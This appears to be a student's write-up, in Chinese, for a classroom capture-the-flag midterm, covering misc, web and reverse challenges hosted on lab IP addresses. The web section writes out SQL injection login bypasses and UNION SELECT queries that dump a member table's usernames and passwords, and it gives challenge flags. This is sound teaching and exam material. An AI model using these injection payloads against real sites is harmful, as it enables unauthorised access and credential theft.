# 上機期中考 WriteUp ## Misc ### Real File 1. 把檔名改為PNG 2. 在圖片中找到CTF --- ## Web ### 木票豆頁 1. 在header 裡面找到flag  ### SQL In啦 http://10.101.2.61:10006/ 1. 帳號和密碼皆輸入 "' OR ''=''-- " ### WarmUp 1. 找到robots.txt 頁面 2. http://10.101.2.28:8000/robots.txt 3. https://tabby.tw/fllllllaaaggggggggg.html 4. CTF{W0w_u_kn0w_f1ag_her3} ### 快還要更快 1. 把網址後半改成index.php  ### Hack me if u can http://10.101.2.61:10002/ 1. 帳號密碼輸入 2. anything 'or'1'='1 3. CTF{SQLsAibpssFOnAX~} ### Haiyaaaaaaaaaaaaaaaa http://10.101.2.61:10005/ 1. 打開cmd 2. curl http://10.101.2.61:10005/ 3. 找到flag ### 安全程式設計很重要 使用curl 和 sql union 指令使sql injection 1. curl -X POST http://10.101.2.61:10007/index.php?id=1 2. http://10.101.2.61:10007/index.php?id=1 union select 1,2, sql FROM sqlite_master; -- - 3. http://10.101.2.61:10007/index.php?id=1 union select id,username, password FROM member; -- - ``` mysql news member CREATE TABLE "member" ( "id" INTEGER NOT NULL, "username" TEXT, "password" TEXT, PRIMARY KEY("id") ) Title: 2 CREATE TABLE "news" ( "id" INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, "title" TEXT, "content" TEXT ) Title: 2 CREATE TABLE sqlite_sequence(name,seq) ``` 3. http://10.101.2.61:10007/index.php?id=1 union select id,username, password FROM member; – --- ## Reverse ### 炎の呼吸 把檔名改為txt，在文本當中找到CTF的FLAG